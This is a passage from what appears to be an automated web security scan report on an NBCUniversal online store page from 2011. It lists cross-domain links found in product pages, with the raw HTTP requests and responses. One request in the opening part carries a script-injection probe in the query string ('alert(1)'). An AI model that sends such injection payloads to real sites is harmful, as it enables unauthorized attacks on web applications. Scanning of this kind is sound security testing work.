http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446846? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446846? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446846? http://api.recaptcha.net/js/recaptcha_ajax.js http://assets.resultspage.com/autosuggest/autosuggest.css http://connect.facebook.net/en_US/all.js http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://html.aggregateknowledge.com/click/nocache/319552888/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1072016&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294588%26icid%3Dxsell http://html.aggregateknowledge.com/click/nocache/493808287/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=203181&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D111426%26icid%3Dxsell http://html.aggregateknowledge.com/click/nocache/850544849/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1088998&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D295440%26icid%3Dxsell http://images.scanalert.com/meter/survey/secure.nbcuniversalstore.com/12.gif http://nbc.com/ http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js http://s7.addthis.com/js/250/addthis_widget.js http://twitter.com/nbcstore http://www.addthis.com/bookmark.php?v=250&username=deliveryagent http://www.deliveryagent.com/ http://www.facebook.com/pages/NBC-Universal-Store/27590173208 http://www.nbcuni.com/ https://www.mcafeesecure.com/RatingVerify?ref=secure.nbcuniversalstore.com
Request
GET /the-office-2012-day-to-day-calendar/detail.php?p=303756%0087e46%3balert(1)//dbde9cd2c5d&v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/?v=nbc_the-office User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 68334 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:20:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:20:46 GMT Connection: close Set-Cookie: DACART=qK2mk5eRnKeppoaV; expires=Tue, 13-Dec-2011 22:20:46 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]... <link href="/nbcuniversalstore/layout/slimbox.css?v=24" type="text/css" rel="stylesheet" /> <link rel="stylesheet" href="http://assets.resultspage.com/autosuggest/autosuggest.css" media="screen" type="text/css"> <link href="/nbcuniversalstore/layout/nbc/nbc.css?v=24" type="text/css" rel="stylesheet" />...[SNIP]... </script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <div id="userMenu" > <a href="http://twitter.com/nbcstore" target="_blank" id="twitter"> <span class="socialize">...[SNIP]... </a><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank" id="facebook"> <span class="socialize">...[SNIP]... </a> <a href="http://NBC.com/" target="_blank" class="partnerlink "> Visit <img src="/nbcuniversalstore/layout/nbc/partnerLogo.gif" />...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446846?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446846?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446846?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446846?" border="0" alt="" /> </a>...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446846?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446846?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446846?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446846?" border="0" alt="" /> </a>...[SNIP]... <div id="contentHolder"> <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... <div class="addthis_toolbox addthis_default_style"> <a href="http://www.addthis.com/bookmark.php?v=250&username=deliveryagent" class="addthis_button last"> <img src="/nbcuniversalstore/layout/ico_addshare.gif" width="16" height="16" border="0" alt="" />...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=deliveryagent"> </script>...[SNIP]... <li> <a href="http://html.aggregateknowledge.com/click/nocache/493808287/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=203181&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D111426%26icid%3Dxsell" class="image"> <img src="/img/product/resized/433/00111426-923433_catl_50.jpg?k=608f4995&pid=111426&s=catl" alt="Mad Money w/ Jim Cramer Bobblehead" /></a> <a href="http://html.aggregateknowledge.com/click/nocache/493808287/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=203181&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D111426%26icid%3Dxsell" class="name"> Mad Money w/ Jim Cramer Bobblehead</a> <a href="http://html.aggregateknowledge.com/click/nocache/493808287/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=203181&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D111426%26icid%3Dxsell" class="price"> <strike>...[SNIP]... <li> <a href="http://html.aggregateknowledge.com/click/nocache/850544849/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1088998&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D295440%26icid%3Dxsell" class="image"> <img src="/img/product/resized/638/00295440-116638_catl_50.jpg?k=74c71735&pid=295440&s=catl" alt="Royal Wedding Catherine Middleton..." /></a> <a href="http://html.aggregateknowledge.com/click/nocache/850544849/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1088998&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D295440%26icid%3Dxsell" class="name"> Royal Wedding Catherine Middleton...</a> <a href="http://html.aggregateknowledge.com/click/nocache/850544849/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1088998&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D295440%26icid%3Dxsell" class="price"> $79.95<!-- IE6 -->...[SNIP]... <li class="last"> <a href="http://html.aggregateknowledge.com/click/nocache/319552888/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1072016&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294588%26icid%3Dxsell" class="image"> <img src="/img/product/resized/633/00294588-893633_catl_50.jpg?k=42c51b37&pid=294588&s=catl" alt="Doctor Who New Booth T-Shirt" /></a> <a href="http://html.aggregateknowledge.com/click/nocache/319552888/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1072016&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294588%26icid%3Dxsell" class="name"> Doctor Who New Booth T-Shirt</a> <a href="http://html.aggregateknowledge.com/click/nocache/319552888/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1072016&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294588%26icid%3Dxsell" class="price"> $25.00<!-- IE6 -->...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446846?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446846?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446846?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446846?" border="0" alt="" /> </a>...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446846?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446846?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446846?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446846?" border="0" alt="" /> </a>...[SNIP]... <li class="facebook"><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank"> <img src="/nbcuniversalstore/layout/logo_facebook.gif" alt="Facebook Logo" />...[SNIP]... <li class="twitter"><a href="http://twitter.com/nbcstore" target="_blank"> <img src="/nbcuniversalstore/layout/logo_twitter.gif" alt="Twitter Logo" />...[SNIP]... <!-- START SCANALERT CODE --> <a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secure.nbcuniversalstore.com"> <img width="115" height="32" border="0" src="//images.scanalert.com/meter/survey/secure.nbcuniversalstore.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"> </a>...[SNIP]... <p id="companyCopy" style="font-size:11px;">©2011 <a href="http://www.nbcuni.com/"> NBCUniversal</a>...[SNIP]... <p id="daPower" style="margin-top:5px;">Powered by <a href="http://www.deliveryagent.com/" target="_blank"> <img src="/nbcuniversalstore/layout/logo_da.gif"alt="Delivery Agent" />...[SNIP]... </script><script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </script> <noscript><img height="1" width="1" border="0" src="http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </noscript>...[SNIP]... </script><script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"> </script>...[SNIP]...
3.5. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-2012-day-to-day-calendar/detail.php
Issue detail
The page was loaded from a URL containing a query string:http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php?p=303756&v=nbc_the-office The response contains the following links to other domains:http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678? http://api.recaptcha.net/js/recaptcha_ajax.js http://assets.resultspage.com/autosuggest/autosuggest.css http://connect.facebook.net/en_US/all.js http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://html.aggregateknowledge.com/click/nocache/319552888/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1072016&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294588%26icid%3Dxsell http://html.aggregateknowledge.com/click/nocache/493808287/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=203181&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D111426%26icid%3Dxsell http://html.aggregateknowledge.com/click/nocache/850544849/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1088998&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D295440%26icid%3Dxsell http://images.scanalert.com/meter/survey/secure.nbcuniversalstore.com/12.gif http://nbc.com/ http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js http://s7.addthis.com/js/250/addthis_widget.js http://twitter.com/nbcstore http://www.addthis.com/bookmark.php?v=250&username=deliveryagent http://www.deliveryagent.com/ http://www.facebook.com/pages/NBC-Universal-Store/27590173208 http://www.nbcuni.com/ https://www.mcafeesecure.com/RatingVerify?ref=secure.nbcuniversalstore.com
Request
GET /the-office-2012-day-to-day-calendar/detail.php?p=303756&v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/?v=nbc_the-office User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 68244 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:58 GMT Connection: close Set-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:17:57 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]... <link href="/nbcuniversalstore/layout/slimbox.css?v=24" type="text/css" rel="stylesheet" /> <link rel="stylesheet" href="http://assets.resultspage.com/autosuggest/autosuggest.css" media="screen" type="text/css"> <link href="/nbcuniversalstore/layout/nbc/nbc.css?v=24" type="text/css" rel="stylesheet" />...[SNIP]... </script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <div id="userMenu" > <a href="http://twitter.com/nbcstore" target="_blank" id="twitter"> <span class="socialize">...[SNIP]... </a><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank" id="facebook"> <span class="socialize">...[SNIP]... </a> <a href="http://NBC.com/" target="_blank" class="partnerlink "> Visit <img src="/nbcuniversalstore/layout/nbc/partnerLogo.gif" />...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678?" border="0" alt="" /> </a>...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678?" border="0" alt="" /> </a>...[SNIP]... <div id="contentHolder"> <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... <div class="addthis_toolbox addthis_default_style"> <a href="http://www.addthis.com/bookmark.php?v=250&username=deliveryagent" class="addthis_button last"> <img src="/nbcuniversalstore/layout/ico_addshare.gif" width="16" height="16" border="0" alt="" />...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=deliveryagent"> </script>...[SNIP]... <li> <a href="http://html.aggregateknowledge.com/click/nocache/493808287/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=203181&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D111426%26icid%3Dxsell" class="image"> <img src="/img/product/resized/433/00111426-923433_catl_50.jpg?k=608f4995&pid=111426&s=catl" alt="Mad Money w/ Jim Cramer Bobblehead" /></a> <a href="http://html.aggregateknowledge.com/click/nocache/493808287/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=203181&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D111426%26icid%3Dxsell" class="name"> Mad Money w/ Jim Cramer Bobblehead</a> <a href="http://html.aggregateknowledge.com/click/nocache/493808287/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=203181&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D111426%26icid%3Dxsell" class="price"> <strike>...[SNIP]... <li> <a href="http://html.aggregateknowledge.com/click/nocache/850544849/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1088998&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D295440%26icid%3Dxsell" class="image"> <img src="/img/product/resized/638/00295440-116638_catl_50.jpg?k=74c71735&pid=295440&s=catl" alt="Royal Wedding Catherine Middleton..." /></a> <a href="http://html.aggregateknowledge.com/click/nocache/850544849/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1088998&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D295440%26icid%3Dxsell" class="name"> Royal Wedding Catherine Middleton...</a> <a href="http://html.aggregateknowledge.com/click/nocache/850544849/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1088998&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D295440%26icid%3Dxsell" class="price"> $79.95<!-- IE6 -->...[SNIP]... <li class="last"> <a href="http://html.aggregateknowledge.com/click/nocache/319552888/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1072016&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294588%26icid%3Dxsell" class="image"> <img src="/img/product/resized/633/00294588-893633_catl_50.jpg?k=42c51b37&pid=294588&s=catl" alt="Doctor Who New Booth T-Shirt" /></a> <a href="http://html.aggregateknowledge.com/click/nocache/319552888/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1072016&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294588%26icid%3Dxsell" class="name"> Doctor Who New Booth T-Shirt</a> <a href="http://html.aggregateknowledge.com/click/nocache/319552888/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1072016&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294588%26icid%3Dxsell" class="price"> $25.00<!-- IE6 -->...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678?" border="0" alt="" /> </a>...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678?" border="0" alt="" /> </a>...[SNIP]... <li class="facebook"><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank"> <img src="/nbcuniversalstore/layout/logo_facebook.gif" alt="Facebook Logo" />...[SNIP]... <li class="twitter"><a href="http://twitter.com/nbcstore" target="_blank"> <img src="/nbcuniversalstore/layout/logo_twitter.gif" alt="Twitter Logo" />...[SNIP]... <!-- START SCANALERT CODE --> <a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secure.nbcuniversalstore.com"> <img width="115" height="32" border="0" src="//images.scanalert.com/meter/survey/secure.nbcuniversalstore.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"> </a>...[SNIP]... <p id="companyCopy" style="font-size:11px;">©2011 <a href="http://www.nbcuni.com/"> NBCUniversal</a>...[SNIP]... <p id="daPower" style="margin-top:5px;">Powered by <a href="http://www.deliveryagent.com/" target="_blank"> <img src="/nbcuniversalstore/layout/logo_da.gif"alt="Delivery Agent" />...[SNIP]... </script><script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </script> <noscript><img height="1" width="1" border="0" src="http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </noscript>...[SNIP]... </script><script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"> </script>...[SNIP]...
3.6. http://www.nbcuniversalstore.com/the-office-dundie-award/detail.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-dundie-award/detail.php
Issue detail
The page was loaded from a URL containing a query string:http://www.nbcuniversalstore.com/the-office-dundie-award/detail.php?p=44960&v=nbc_the-office The response contains the following links to other domains:http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678? http://api.recaptcha.net/js/recaptcha_ajax.js http://assets.resultspage.com/autosuggest/autosuggest.css http://connect.facebook.net/en_US/all.js http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 